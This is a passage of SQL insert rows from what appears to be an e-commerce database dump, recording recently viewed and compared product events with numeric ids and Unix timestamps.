(2932, 'recently_viewed_product', 2581, NULL, 2058, 1726617600),
(2940, 'recently_viewed_product', 2587, NULL, 2055, 1726876800),
(2945, 'recently_viewed_product', 2592, NULL, 2062, 1726963200),
(2949, 'recently_viewed_product', 2598, NULL, 2062, 1727049600),
(2951, 'recently_viewed_product', 2600, NULL, 2062, 1727049600),
(2953, 'recently_viewed_product', 2602, NULL, 2062, 1727136000),
(2956, 'recently_viewed_product', 2605, NULL, 2061, 1727136000),
(2958, 'recently_viewed_product', 2607, NULL, 2059, 1727222400),
(2960, 'recently_viewed_product', 2610, NULL, 2059, 1727222400),
(2963, 'recently_viewed_product', 2613, NULL, 2062, 1727308800),
(2966, 'recently_viewed_product', 2616, NULL, 2055, 1727386313),
(2970, 'recently_viewed_product', 2621, NULL, 2058, 1727481600),
(2985, 'recently_viewed_product', 2640, NULL, 2058, 1728000000),
(2986, 'recently_viewed_product', 2641, NULL, 2062, 1728000000),
(2988, 'recently_viewed_product', 2643, NULL, 2060, 1728086400),
(2991, 'recently_viewed_product', 2646, NULL, 2055, 1728086400),
(2993, 'recently_viewed_product', 2648, NULL, 2055, 1728213271),
(2995, 'recently_viewed_product', 2650, NULL, 2061, 1728172800),
(2997, 'recently_viewed_product', 2653, NULL, 2059, 1728172800),
(3000, 'recently_viewed_product', 2656, NULL, 2060, 1728345600),
(3008, 'recently_viewed_product', 2665, NULL, 2059, 1728560255),
(3010, 'recently_viewed_product', 2667, NULL, 2058, 1728576450),
(3012, 'recently_viewed_product', 2668, NULL, 2058, 1728518400),
(3014, 'recently_viewed_product', 2670, NULL, 2058, 1728518400),
(3015, 'recently_viewed_product', 2671, NULL, 2062, 1728589087),
(3016, 'recently_viewed_product', 2673, NULL, 2055, 1728610053),
(3017, 'recently_viewed_product', 2674, NULL, 2059, 1728604800),
(3018, 'recently_viewed_product', 2675, NULL, 2059, 1728604800),
(3022, 'recently_viewed_product', 2679, NULL, 2055, 1728691200),
(3024, 'recently_viewed_product', 2681, NULL, 2059, 1728798769),
(3025, 'recently_viewed_product', 2682, NULL, 2059, 1728798769),
(3026, 'recently_viewed_product', 2683, NULL, 2059, 1728798827),
(3035, 'recently_viewed_product', 2692, NULL, 2062, 1729036800),
(3040, 'recently_viewed_product', 2698, NULL, 2060, 1729296000),
(3042, 'recently_viewed_product', 2700, NULL, 2053, 1729382400),
(3044, 'recently_viewed_product', 2702, NULL, 2060, 1729382400),
(3048, 'recently_viewed_product', 2709, NULL, 2059, 1729555200),
(3054, 'recently_viewed_product', 2717, NULL, 2060, 1729641600),
(3055, 'recently_viewed_product', 2718, NULL, 2059, 1729641600),
(3069, 'recently_viewed_product', 2733, NULL, 2062, 1730073600),
(3076, 'recently_viewed_product', 2741, NULL, 2061, 1730505600),
(3080, 'recently_viewed_product', 2746, NULL, 2059, 1730678400),
(3085, 'recently_viewed_product', 2752, NULL, 2059, 1730764800),
(3086, 'recently_viewed_product', 2753, NULL, 2059, 1730764800),
(3091, 'recently_viewed_product', 2758, NULL, 2055, 1730937600),
(3096, 'recently_viewed_product', 2763, NULL, 2060, 1731196800),
(3098, 'recently_viewed_product', 2765, NULL, 2062, 1731283200),
(3099, 'recently_viewed_product', 2766, NULL, 2060, 1731283200),
(3100, 'recently_viewed_product', 2767, NULL, 2059, 1731315557),
(3102, 'recently_viewed_product', 2769, NULL, 2061, 1731369600),
(3105, 'recently_viewed_product', 2772, NULL, 2062, 1731369600),
(3106, 'recently_viewed_product', 2773, NULL, 2058, 1731456000),
(3115, 'recently_viewed_product', 2783, NULL, 2061, 1731628800),
(3119, 'recently_viewed_product', 2788, NULL, 2059, 1731801600),
(3120, 'recently_viewed_product', 2789, NULL, 2059, 1731801600),
(3121, 'recently_viewed_product', 2790, NULL, 2061, 1731854312),
(3125, 'recently_viewed_product', 2794, NULL, 2062, 1732233600),
(3128, 'recently_viewed_product', 2797, NULL, 2062, 1732320000),
(3129, 'recently_viewed_product', 2798, NULL, 2058, 1732320000),
(3130, 'recently_viewed_product', 2799, NULL, 2058, 1732320000),
(3131, 'recently_viewed_product', 2800, NULL, 2059, 1732320000),
(3132, 'recently_viewed_product', 2801, NULL, 2055, 1732320000),
(3134, 'recently_viewed_product', 2803, NULL, 2059, 1732453537),
(3136, 'recently_viewed_product', 2805, NULL, 2058, 1732464099),
(3137, 'recently_viewed_product', 2806, NULL, 2062, 1732476705),
(3138, 'recently_viewed_product', 2807, NULL, 2059, 1732406400),
(3140, 'recently_viewed_product', 2809, NULL, 2055, 1732496508),
(3143, 'recently_viewed_product', 2812, NULL, 2061, 1732492800),
(3145, 'recently_viewed_product', 2814, NULL, 2055, 1732579200),
(3146, 'recently_viewed_product', 2815, NULL, 2062, 1732579200),
(3153, 'recently_viewed_product', 2822, NULL, 2062, 1733097600),
(3154, 'recently_viewed_product', 2823, NULL, 2061, 1733184000),
(3157, 'recently_viewed_product', 2826, NULL, 2059, 1733270400),
(3158, 'recently_viewed_product', 2827, NULL, 2059, 1733312463),
(3159, 'recently_viewed_product', 2828, NULL, 2062, 1733356800),
(3160, 'recently_viewed_product', 2829, NULL, 2060, 1733356800),
(3161, 'recently_viewed_product', 2830, NULL, 2058, 1733356800),
(3162, 'recently_viewed_product', 2831, NULL, 2059, 1733356800),
(3179, 'recently_viewed_product', 2848, NULL, 2060, 1734393600),
(3180, 'recently_viewed_product', 2849, NULL, 2059, 1734469447),
(3181, 'recently_viewed_product', 2850, NULL, 2059, 1734480000),
(3182, 'recently_viewed_product', 2851, NULL, 2053, 1734489964),
(3183, 'recently_viewed_product', 2853, NULL, 2062, 1734652800),
(3188, 'recently_viewed_product', 2858, NULL, 2061, 1734912000),
(3189, 'recently_viewed_product', 2859, NULL, 2053, 1735136305),
(3190, 'recently_viewed_product', 2860, NULL, 2060, 1735318785),
(3192, 'recently_viewed_product', 2862, NULL, 2059, 1735516800),
(3193, 'recently_viewed_product', 2863, NULL, 2059, 1735648388),
(3194, 'recently_viewed_product', 2864, NULL, 2061, 1735689600),
(3196, 'recently_viewed_product', 2866, NULL, 2059, 1735862400),
(3197, 'recently_viewed_product', 2867, NULL, 2059, 1736035200),
(3198, 'recently_viewed_product', 2868, NULL, 2061, 1736120659),
(3201, 'recently_viewed_product', 2871, NULL, 2058, 1736208000),
(3204, 'recently_viewed_product', 2873, NULL, 2060, 1736289736),
(3206, 'recently_viewed_product', 2875, NULL, 2058, 1736350796),
(3207, 'recently_viewed_product', 2876, NULL, 2055, 1736393903),
(3208, 'recently_viewed_product', 2877, NULL, 2060, 1736467200),
(3209, 'recently_viewed_product', 2878, NULL, 2058, 1736467200),
(3211, 'recently_viewed_product', 2880, NULL, 2062, 1736467200),
(3212, 'recently_viewed_product', 2881, NULL, 2060, 1736676295),
(3213, 'recently_viewed_product', 2882, NULL, 2053, 1736741194),
(3214, 'recently_viewed_product', 2883, NULL, 2062, 1736726400),
(3215, 'recently_viewed_product', 2884, NULL, 2061, 1736726400),
(3221, 'recently_viewed_product', 2889, NULL, 2060, 1737095695),
(3222, 'recently_viewed_product', 2890, NULL, 2055, 1737158400),
(3224, 'recently_viewed_product', 2892, NULL, 2059, 1737244800),
(3225, 'recently_viewed_product', 2893, NULL, 2060, 1737331200),
(3226, 'recently_viewed_product', 2894, NULL, 2059, 1737417600),
(3228, 'recently_viewed_product', 2896, NULL, 2055, 1737417600),
(3229, 'recently_viewed_product', 2897, NULL, 2059, 1737417600),
(3232, 'recently_viewed_product', 2901, NULL, 2058, 1737504000),
(3233, 'recently_viewed_product', 2902, NULL, 2058, 1737504000),
(3234, 'recently_viewed_product', 2903, NULL, 2061, 1737590400),
(3235, 'recently_viewed_product', 2904, NULL, 2062, 1737763200),
(3237, 'recently_viewed_product', 2907, NULL, 2060, 1737862715),
(3239, 'recently_viewed_product', 2916, NULL, 2060, 1738115921),
(3241, 'recently_viewed_product', 2918, NULL, 2060, 1738152688),
(3242, 'recently_viewed_product', 2919, NULL, 2060, 1738161240),
(3243, 'recently_viewed_product', 2920, NULL, 2060, 1738108800),
(3244, 'recently_viewed_product', 2921, NULL, 2060, 1738108800),
(3245, 'recently_viewed_product', 2923, NULL, 2062, 1738195200),
(3247, 'recently_viewed_product', 2925, NULL, 2059, 1738454400),
(3249, 'recently_viewed_product', 2927, NULL, 2058, 1738540800),
(3250, 'recently_viewed_product', 2928, NULL, 2058, 1738540800),
(3251, 'recently_viewed_product', 2929, NULL, 2061, 1738627200),
(3253, 'recently_viewed_product', 2934, NULL, 2059, 1738972800),
(3254, 'recently_viewed_product', 2935, NULL, 2062, 1738972800),
(3256, 'recently_viewed_product', 2937, NULL, 2058, 1738972800),
(3258, 'recently_viewed_product', 2940, NULL, 2062, 1739059200),
(3261, 'recently_viewed_product', 2943, NULL, 2061, 1739318400),
(3262, 'recently_viewed_product', 2944, NULL, 2060, 1739318400),
(3263, 'recently_viewed_product', 2945, NULL, 2062, 1739404800),
(3267, 'recently_viewed_product', 2949, NULL, 2059, 1739923200),
(3270, 'recently_viewed_product', 2952, NULL, 2061, 1740096000),
(3272, 'recently_viewed_product', 2955, NULL, 2059, 1740355200),
(3273, 'recently_viewed_product', 2956, NULL, 2059, 1740355200),
(3276, 'recently_viewed_product', 2958, NULL, 2053, 1740486172),
(3277, 'recently_viewed_product', 2959, NULL, 2062, 1740486810),
(3280, 'recently_viewed_product', 2962, NULL, 2055, 1740488878),
(3281, 'recently_viewed_product', 2963, NULL, 2058, 1740491219),
(3282, 'recently_viewed_product', 2964, NULL, 2062, 1740491972),
(3283, 'recently_viewed_product', 2965, NULL, 2059, 1740492739),
(3284, 'recently_viewed_product', 2966, NULL, 2060, 1740493225),
(3285, 'recently_viewed_product', 2967, NULL, 2055, 1740493417),
(3287, 'recently_viewed_product', 2969, NULL, 2059, 1740493969),
(3288, 'recently_viewed_product', 2970, NULL, 2053, 1740495057),
(3290, 'recently_viewed_product', 2972, NULL, 2061, 1740496471),
(3291, 'recently_viewed_product', 2973, NULL, 2060, 1740497595),
(3294, 'recently_viewed_product', 2976, NULL, 2061, 1740502658),
(3295, 'recently_viewed_product', 2977, NULL, 2058, 1740508050),
(3296, 'recently_viewed_product', 2978, NULL, 2062, 1740441600),
(3300, 'recently_viewed_product', 2982, NULL, 2053, 1740716845),
(3301, 'recently_viewed_product', 2983, NULL, 2059, 1740716954),
(3303, 'recently_viewed_product', 2985, NULL, 2061, 1740718498),
(3306, 'recently_viewed_product', 2988, NULL, 2062, 1740721161),
(3307, 'recently_viewed_product', 2989, NULL, 2058, 1740721257),
(3308, 'recently_viewed_product', 2990, NULL, 2055, 1740724107),
(3309, 'recently_viewed_product', 2991, NULL, 2060, 1740724251),
(3311, 'recently_viewed_product', 2994, NULL, 2059, 1740787200),
(3312, 'recently_viewed_product', 2995, NULL, 2058, 1740873600),
(3313, 'recently_viewed_product', 2998, NULL, 2055, 1741046400),
(3314, 'recently_viewed_product', 3000, NULL, 2053, 1741233208),
(3315, 'recently_viewed_product', 3001, NULL, 2059, 1741219200),
(3316, 'recently_viewed_product', 3002, NULL, 2062, 1741219200),
(3317, 'recently_viewed_product', 3003, NULL, 2053, 1741320354),
(3318, 'recently_viewed_product', 3004, NULL, 2061, 1741357272),
(3319, 'recently_viewed_product', 3005, NULL, 2055, 1741357360),
(3321, 'recently_viewed_product', 3007, NULL, 2059, 1741360902),
(3322, 'recently_viewed_product', 3008, NULL, 2058, 1741366198),
(3323, 'recently_viewed_product', 3009, NULL, 2060, 1741367522),
(3324, 'recently_viewed_product', 3010, NULL, 2062, 1741367836),
(3327, 'recently_viewed_product', 3013, NULL, 2053, 1741421368),
(3329, 'recently_viewed_product', 3024, NULL, 2061, 1741564800),
(3330, 'recently_viewed_product', 3025, NULL, 2059, 1741564800),
(3332, 'recently_viewed_product', 3027, NULL, 2058, 1741651200),
(3337, 'recently_viewed_product', 3034, NULL, 2053, 1742198760),
(3338, 'recently_viewed_product', 3035, NULL, 2060, 1742169600),
(3339, 'recently_viewed_product', 3036, NULL, 2060, 1742256000),
(3341, 'recently_viewed_product', 3039, NULL, 2059, 1742601600),
(3343, 'recently_viewed_product', 3041, NULL, 2058, 1742688000),
(3344, 'recently_viewed_product', 3044, NULL, 2059, 1742947200),
(3345, 'recently_viewed_product', 3045, NULL, 2059, 1742947200),
(3347, 'recently_viewed_product', 3047, NULL, 2062, 1743033600),
(3348, 'recently_viewed_product', 3048, NULL, 2061, 1743198681),
(3349, 'recently_viewed_product', 3049, NULL, 2061, 1743200380),
(3350, 'recently_viewed_product', 3061, NULL, 2058, 1743724800),
(3351, 'recently_viewed_product', 3062, NULL, 2058, 1743811200),
(3352, 'recently_viewed_product', 3067, NULL, 2059, 1743984000),
(3354, 'recently_viewed_product', 3078, NULL, 2062, 1744329600),
(3359, 'recently_viewed_product', 3102, NULL, 2055, 1744848000),
(3361, 'recently_viewed_product', 3115, NULL, 2061, 1745280000),
(3362, 'recently_viewed_product', 3138, NULL, 2059, 1746403200),
(3363, 'recently_viewed_product', 3140, NULL, 2061, 1746594190),
(3364, 'recently_viewed_product', 3141, NULL, 2061, 1746594184),
(3365, 'recently_viewed_product', 3143, NULL, 2061, 1746748800),
(3366, 'recently_viewed_product', 3144, NULL, 2062, 1746835200),
(3368, 'recently_viewed_product', 3147, NULL, 2058, 1747267200),
(3369, 'recently_viewed_product', 3148, NULL, 2059, 1747785600),
(3370, 'recently_viewed_product', 3149, NULL, 2061, 1747872000),
(3373, 'recently_viewed_product', 3152, NULL, 2062, 1748044800),
(3375, 'recently_viewed_product', 3154, NULL, 2059, 1748217600),
(3378, 'recently_viewed_product', 3158, NULL, 2062, 1748563200),
(3379, 'recently_viewed_product', 3159, NULL, 2059, 1748736000),
(3383, 'recently_viewed_product', 3163, NULL, 2059, 1749427200),
(3384, 'recently_viewed_product', 3164, NULL, 2062, 1749463933),
(3385, 'recently_viewed_product', 3166, NULL, 2061, 1749513600),
(3387, 'recently_viewed_product', 3169, NULL, 2058, 1749867688),
(3393, 'recently_viewed_product', NULL, NULL, 2054, 1750143340),
(3397, 'recently_viewed_product', 3175, NULL, 2054, 1750291200),
(3398, 'recently_viewed_product', 3176, NULL, 2054, 1750291200),
(3399, 'recently_viewed_product', 3177, NULL, 2059, 1750377600),
(3401, 'recently_viewed_product', 3179, NULL, 2055, 1750377600),
(3403, 'recently_viewed_product', 3181, NULL, 2062, 1750377600),
(3404, 'recently_viewed_product', 3182, NULL, 2053, 1750473500),
(3407, 'recently_viewed_product', 3185, NULL, 2061, 1750464000),
(3409, 'recently_viewed_product', 3187, NULL, 2053, 1750503384),
(3410, 'recently_viewed_product', 3188, NULL, 2054, 1750464000),
(3411, 'recently_viewed_product', 3189, NULL, 2053, 1750539089),
(3412, 'recently_viewed_product', 3190, NULL, 2054, 1750550400),
(3413, 'recently_viewed_product', 3191, NULL, 2053, 1750558537),
(3417, 'recently_viewed_product', 3195, NULL, 2054, 1750636800),
(3419, 'recently_viewed_product', 3197, NULL, 2060, 1750636800),
(3420, 'recently_viewed_product', 3198, NULL, 2054, 1750636800),
(3422, 'recently_viewed_product', 3200, NULL, 2053, 1750666272),
(3423, 'recently_viewed_product', 3201, NULL, 2053, 1750667048),
(3424, 'recently_viewed_product', 3202, NULL, 2055, 1750636800),
(3426, 'recently_viewed_product', 3204, NULL, 2061, 1750723200),
(3427, 'recently_viewed_product', 3205, NULL, 2054, 1750723200),
(3429, 'recently_viewed_product', 3207, NULL, 2059, 1750723200),
(3430, 'recently_viewed_product', 3208, NULL, 2062, 1750723200),
(3432, 'recently_viewed_product', 3210, NULL, 2059, 1750723200),
(3434, 'recently_viewed_product', 3212, NULL, 2061, 1750723200),
(3437, 'recently_viewed_product', 3215, NULL, 2061, 1750723200),
(3438, 'recently_viewed_product', 3216, NULL, 2054, 1750723200),
(3440, 'recently_viewed_product', 3218, NULL, 2053, 1750774991),
(3441, 'recently_viewed_product', 3219, NULL, 2053, 1750782168),
(3442, 'recently_viewed_product', 3220, NULL, 2058, 1750723200),
(3444, 'recently_viewed_product', 3222, NULL, 2053, 1750812696),
(3448, 'recently_viewed_product', 3226, NULL, 2058, 1750809600),
(3449, 'recently_viewed_product', 3227, NULL, 2053, 1750845188),
(3452, 'recently_viewed_product', 3231, NULL, 2053, 1750858969),
(3454, 'recently_viewed_product', 3233, NULL, 2053, 1750860950),
(3456, 'recently_viewed_product', 3235, NULL, 2053, 1750885685),
(3460, 'recently_viewed_product', 3239, NULL, 2053, 1750913145),
(3464, 'recently_viewed_product', 3243, NULL, 2053, 1750926439),
(3465, 'recently_viewed_product', 3244, NULL, 2061, 1750896000),
(3466, 'recently_viewed_product', 3245, NULL, 2054, 1750966993),
(3467, 'recently_viewed_product', 3246, NULL, 2053, 1750988722),
(3468, 'recently_viewed_product', 3247, NULL, 2054, 1750990068),
(3471, 'recently_viewed_product', 3250, NULL, 2053, 1751030367),
(3473, 'recently_viewed_product', 3252, NULL, 2060, 1751078335),
(3474, 'recently_viewed_product', 3253, NULL, 2053, 1751079936),
(3476, 'recently_viewed_product', 3255, NULL, 2060, 1751103560),
(3479, 'recently_viewed_product', 3258, NULL, 2053, 1751139303),
(3480, 'recently_viewed_product', 3259, NULL, 2060, 1751145438),
(3482, 'recently_viewed_product', 3261, NULL, 2060, 1751164561),
(3483, 'recently_viewed_product', 3263, NULL, 2060, 1751206507),
(3484, 'recently_viewed_product', 3264, NULL, 2053, 1751207697),
(3485, 'recently_viewed_product', 3265, NULL, 2060, 1751248731),
(3486, 'recently_viewed_product', 3267, NULL, 2053, 1751291369),
(3487, 'recently_viewed_product', 3268, NULL, 2060, 1751294425),
(3489, 'recently_viewed_product', 3270, NULL, 2060, 1751342343),
(3490, 'recently_viewed_product', 3272, NULL, 2053, 1751482479),
(3491, 'recently_viewed_product', 3274, NULL, 2060, 1751515174),
(3492, 'recently_viewed_product', 3275, NULL, 2060, 1751528710),
(3494, 'recently_viewed_product', 3277, NULL, 2059, 1751500800),
(3495, 'recently_viewed_product', 3278, NULL, 2054, 1751500800),
(3499, 'recently_viewed_product', 3282, NULL, 2053, 1751632115),
(3500, 'recently_viewed_product', 3285, NULL, 2060, 1751697913),
(3501, 'recently_viewed_product', 3286, NULL, 2061, 1751673600),
(3502, 'recently_viewed_product', 3287, NULL, 2059, 1751673600),
(3504, 'recently_viewed_product', 3289, NULL, 2061, 1751846400),
(3505, 'recently_viewed_product', 3290, NULL, 2060, 1751913650),
(3506, 'recently_viewed_product', 3291, NULL, 2060, 1751947433),
(3508, 'recently_viewed_product', 3293, NULL, 2059, 1751932800),
(3509, 'recently_viewed_product', 3294, NULL, 2053, 1752025964),
(3510, 'recently_viewed_product', 3295, NULL, 2060, 1752027439),
(3511, 'recently_viewed_product', 3296, NULL, 2060, 1752036157),
(3512, 'recently_viewed_product', 3297, NULL, 2054, 1752019200),
(3516, 'recently_viewed_product', 3302, NULL, 2054, 1752019200),
(3517, 'recently_viewed_product', 3303, NULL, 2058, 1752105600),
(3518, 'recently_viewed_product', 3304, NULL, 2055, 1752105600),
(3520, 'recently_viewed_product', 3306, NULL, 2060, 1752445935),
(3522, 'recently_viewed_product', 3308, NULL, 2059, 1752451200),
(3523, 'recently_viewed_product', 3309, NULL, 2062, 1752476557),
(3526, 'recently_viewed_product', 3313, NULL, 2060, 1752520683),
(3527, 'recently_viewed_product', 3314, NULL, 2059, 1752624000),
(3529, 'recently_viewed_product', 3316, NULL, 2054, 1752624000),
(3530, 'recently_viewed_product', 3317, NULL, 2060, 1752698860),
(3531, 'recently_viewed_product', 3318, NULL, 2060, 1752716381),
(3532, 'recently_viewed_product', 3320, NULL, 2061, 1752710400),
(3534, 'recently_viewed_product', 3322, NULL, 2054, 1752710400),
(3536, 'recently_viewed_product', 3326, NULL, 2060, 1752795725),
(3537, 'recently_viewed_product', 3327, NULL, 2053, 1752867053),
(3538, 'recently_viewed_product', 3328, NULL, 2055, 1752867604),
(3540, 'recently_viewed_product', 3330, NULL, 2058, 1752951325),
(3541, 'recently_viewed_product', 3331, NULL, 2058, 1752883200),
(3542, 'recently_viewed_product', 3332, NULL, 2054, 1752883200),
(3543, 'recently_viewed_product', 3333, NULL, 2062, 1752969600),
(3544, 'recently_viewed_product', 3334, NULL, 2053, 1752974936),
(3545, 'recently_viewed_product', 3335, NULL, 2060, 1753043383),
(3546, 'recently_viewed_product', 3336, NULL, 2061, 1753075950),
(3547, 'recently_viewed_product', 3337, NULL, 2061, 1753090301),
(3548, 'recently_viewed_product', 3338, NULL, 2060, 1753091605),
(3549, 'recently_viewed_product', 3339, NULL, 2054, 1753056000),
(3550, 'recently_viewed_product', 3340, NULL, 2059, 1753056000),
(3551, 'recently_viewed_product', 3341, NULL, 2055, 1753118213),
(3552, 'recently_viewed_product', 3342, NULL, 2055, 1753056000),
(3553, 'recently_viewed_product', 3343, NULL, 2053, 1753139782),
(3555, 'recently_viewed_product', 3345, NULL, 2060, 1753172972),
(3557, 'recently_viewed_product', 3347, NULL, 2061, 1753350404),
(3558, 'recently_viewed_product', 3349, NULL, 2061, 1753361373),
(3559, 'recently_viewed_product', 3350, NULL, 2061, 1753364435),
(3560, 'recently_viewed_product', 3351, NULL, 2060, 1753369935),
(3562, 'recently_viewed_product', 3353, NULL, 2061, 1753463977),
(3563, 'recently_viewed_product', 3354, NULL, 2054, 1753401600),
(3564, 'recently_viewed_product', 3355, NULL, 2060, 1753481981),
(3565, 'recently_viewed_product', 3356, NULL, 2060, 1753541937),
(3566, 'recently_viewed_product', 3357, NULL, 2060, 1753703514),
(3567, 'recently_viewed_product', 3358, NULL, 2055, 1753660800),
(3568, 'recently_viewed_product', 3359, NULL, 2061, 1753711806),
(3571, 'recently_viewed_product', 3362, NULL, 2061, 1753747200),
(3573, 'recently_viewed_product', 3364, NULL, 2061, 1753871737),
(3574, 'recently_viewed_product', 3365, NULL, 2053, 1753876146),
(3575, 'recently_viewed_product', 3366, NULL, 2060, 1753886343),
(3578, 'recently_viewed_product', 3369, NULL, 2061, 1753928030),
(3579, 'recently_viewed_product', 3370, NULL, 2059, 1753920000),
(3582, 'recently_viewed_product', 3373, NULL, 2061, 1754017999),
(3584, 'recently_viewed_product', 3374, NULL, 2060, 1754025938),
(3585, 'recently_viewed_product', 3375, NULL, 2055, 1754097403),
(3587, 'recently_viewed_product', 3377, NULL, 2061, 1754146827),
(3588, 'recently_viewed_product', 3378, NULL, 2060, 1754162364),
(3589, 'recently_viewed_product', 3379, NULL, 2060, 1754248106),
(3590, 'recently_viewed_product', 3380, NULL, 2060, 1754291772),
(3591, 'recently_viewed_product', 3381, NULL, 2053, 1754305996),
(3592, 'recently_viewed_product', 3382, NULL, 2061, 1754349297),
(3593, 'recently_viewed_product', 3383, NULL, 2060, 1754417761),
(3594, 'recently_viewed_product', 3384, NULL, 2061, 1754450853),
(3595, 'recently_viewed_product', 3385, NULL, 2061, 1754451012),
(3596, 'recently_viewed_product', 3386, NULL, 2053, 1754490485),
(3598, 'recently_viewed_product', 3388, NULL, 2060, 1754523143),
(3599, 'recently_viewed_product', 3389, NULL, 2060, 1754538263),
(3600, 'recently_viewed_product', 3390, NULL, 2061, 1754544467),
(3601, 'recently_viewed_product', 3392, NULL, 2053, 1754630801),
(3602, 'recently_viewed_product', 3393, NULL, 2061, 1754690218),
(3603, 'recently_viewed_product', 3394, NULL, 2060, 1754703090),
(3604, 'recently_viewed_product', 3395, NULL, 2061, 1754734412),
(3605, 'recently_viewed_product', 3396, NULL, 2053, 1754737025),
(3606, 'recently_viewed_product', 3397, NULL, 2061, 1754759661),
(3607, 'recently_viewed_product', 3398, NULL, 2060, 1754812056),
(3608, 'recently_viewed_product', 3399, NULL, 2053, 1754841214),
(3609, 'recently_viewed_product', 3400, NULL, 2061, 1754843678),
(3610, 'recently_viewed_product', 3401, NULL, 2061, 1754873305),
(3611, 'recently_viewed_product', 3402, NULL, 2053, 1754875207),
(3612, 'recently_viewed_product', 3403, NULL, 2059, 1754870400),
(3613, 'recently_viewed_product', 3404, NULL, 2061, 1754920350),
(3615, 'recently_viewed_product', 3406, NULL, 2060, 1754983732),
(3616, 'recently_viewed_product', 3407, NULL, 2053, 1754987812),
(3617, 'recently_viewed_product', 3408, NULL, 2054, 1754956800),
(3618, 'recently_viewed_product', 3409, NULL, 2053, 1755011233),
(3619, 'recently_viewed_product', 3410, NULL, 2061, 1755011652),
(3620, 'recently_viewed_product', 3411, NULL, 2060, 1755064484),
(3622, 'recently_viewed_product', 3413, NULL, 2060, 1755186578),
(3623, 'recently_viewed_product', 3414, NULL, 2061, 1755197538),
(3624, 'recently_viewed_product', 3415, NULL, 2060, 1755215028),
(3625, 'recently_viewed_product', 3416, NULL, 2061, 1755231438),
(3626, 'recently_viewed_product', 3417, NULL, 2061, 1755277527),
(3627, 'recently_viewed_product', 3418, NULL, 2061, 1755279452),
(3628, 'recently_viewed_product', 3419, NULL, 2061, 1755281379),
(3629, 'recently_viewed_product', 3420, NULL, 2061, 1755283716),
(3630, 'recently_viewed_product', 3421, NULL, 2061, 1755286360),
(3631, 'recently_viewed_product', 3422, NULL, 2061, 1755291220),
(3632, 'recently_viewed_product', 3423, NULL, 2060, 1755320040),
(3633, 'recently_viewed_product', 3424, NULL, 2060, 1755322446),
(3635, 'recently_viewed_product', 3426, NULL, 2060, 1755324720),
(3636, 'recently_viewed_product', 3427, NULL, 2061, 1755326147),
(3637, 'recently_viewed_product', 3428, NULL, 2060, 1755326261),
(3638, 'recently_viewed_product', 3429, NULL, 2061, 1755333841),
(3639, 'recently_viewed_product', 3430, NULL, 2061, 1755336599),
(3640, 'recently_viewed_product', 3431, NULL, 2061, 1755339967),
(3641, 'recently_viewed_product', 3432, NULL, 2061, 1755355359),
(3642, 'recently_viewed_product', 3433, NULL, 2053, 1755358266),
(3645, 'recently_viewed_product', 3435, NULL, 2053, 1755430989),
(3646, 'recently_viewed_product', 3436, NULL, 2061, 1755468739),
(3647, 'recently_viewed_product', 3437, NULL, 2061, 1755487228),
(3648, 'recently_viewed_product', 3438, NULL, 2061, 1755492394),
(3649, 'recently_viewed_product', 3439, NULL, 2061, 1755494795),
(3650, 'recently_viewed_product', 3440, NULL, 2061, 1755510294),
(3651, 'recently_viewed_product', 3441, NULL, 2061, 1755512245),
(3652, 'recently_viewed_product', 3442, NULL, 2061, 1755516228),
(3653, 'recently_viewed_product', 3443, NULL, 2061, 1755519819),
(3654, 'recently_viewed_product', 3444, NULL, 2061, 1755523421),
(3655, 'recently_viewed_product', 3445, NULL, 2061, 1755534325),
(3658, 'recently_viewed_product', 3448, NULL, 2061, 1755643591),
(3659, 'recently_viewed_product', 3449, NULL, 2060, 1755667059),
(3663, 'recently_compared_product', 3450, NULL, 2061, 1755673339),
(3665, 'recently_viewed_product', 3452, NULL, 2060, 1755752152),
(3666, 'recently_viewed_product', 3453, NULL, 2061, 1755763837),
(3667, 'recently_viewed_product', 3454, NULL, 2061, 1755734400),
(3668, 'recently_viewed_product', 3455, NULL, 2058, 1755793433),
(3669, 'recently_viewed_product', 3456, NULL, 2058, 1755831607),
(3671, 'recently_viewed_product', 3457, NULL, 2061, 1755820800),
(3672, 'recently_viewed_product', 3458, NULL, 2060, 1755858826),
(3673, 'recently_viewed_product', 3459, NULL, 2061, 1755905436),
(3674, 'recently_viewed_product', 3460, NULL, 2054, 1755909535),
(3675, 'recently_viewed_product', 3461, NULL, 2053, 1755918606),
(3676, 'recently_viewed_product', 3462, NULL, 2061, 1755956456),
(3677, 'recently_viewed_product', 3463, NULL, 2061, 1755970276),
(3680, 'recently_viewed_product', 3466, NULL, 2061, 1756086550),
(3681, 'recently_viewed_product', 3467, NULL, 2060, 1756097155),
(3683, 'recently_viewed_product', 3469, NULL, 2055, 1756166400),
(3684, 'recently_viewed_product', 3470, NULL, 2061, 1756226076),
(3685, 'recently_viewed_product', 3471, NULL, 2053, 1756228289),
(3686, 'recently_viewed_product', 3472, NULL, 2060, 1756232140),
(3687, 'recently_viewed_product', 3473, NULL, 2062, 1756252800),
(3688, 'recently_viewed_product', 3474, NULL, 2061, 1756280590),
(3689, 'recently_viewed_product', 3475, NULL, 2059, 1756252800),
(3690, 'recently_viewed_product', 3476, NULL, 2058, 1756360646),
(3691, 'recently_viewed_product', 3477, NULL, 2062, 1756364486),
(3694, 'recently_viewed_product', 3480, NULL, 2058, 1756339200),
(3697, 'recently_viewed_product', 3487, NULL, 2054, 1756339200),
(3698, 'recently_viewed_product', 3488, NULL, 2061, 1756434595),
(3699, 'recently_viewed_product', 3489, NULL, 2061, 1756446606),
(3700, 'recently_viewed_product', 3490, NULL, 2061, 1756425600),
(3701, 'recently_viewed_product', 3491, NULL, 2053, 1756458423),
(3702, 'recently_viewed_product', 3492, NULL, 2060, 1756462285),
(3704, 'recently_viewed_product', 3494, NULL, 2053, 1756544915),
(3705, 'recently_viewed_product', 3495, NULL, 2054, 1756562816),
(3706, 'recently_viewed_product', 3496, NULL, 2058, 1756611116),
(3707, 'recently_viewed_product', 3497, NULL, 2053, 1756627484),
(3709, 'recently_viewed_product', 3499, NULL, 2061, 1756635374),
(3710, 'recently_viewed_product', 3500, NULL, 2060, 1756635688),
(3711, 'recently_viewed_product', 3501, NULL, 2060, 1756642829),
(3712, 'recently_viewed_product', 3502, NULL, 2053, 1756656275),
(3713, 'recently_viewed_product', 3503, NULL, 2060, 1756682964),
(3714, 'recently_viewed_product', 3504, NULL, 2061, 1756707438),
(3717, 'recently_viewed_product', 3507, NULL, 2054, 1756728396),
(3718, 'recently_viewed_product', 3508, NULL, 2061, 1756728556),
(3719, 'recently_viewed_product', 3509, NULL, 2053, 1756760347),
(3720, 'recently_viewed_product', 3510, NULL, 2061, 1756771200),
(3721, 'recently_viewed_product', 3511, NULL, 2060, 1756801828),
